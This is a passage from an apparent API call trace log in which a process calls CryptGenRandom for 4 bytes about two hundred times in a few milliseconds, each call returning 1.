(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.284] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.285] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.286] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.287] 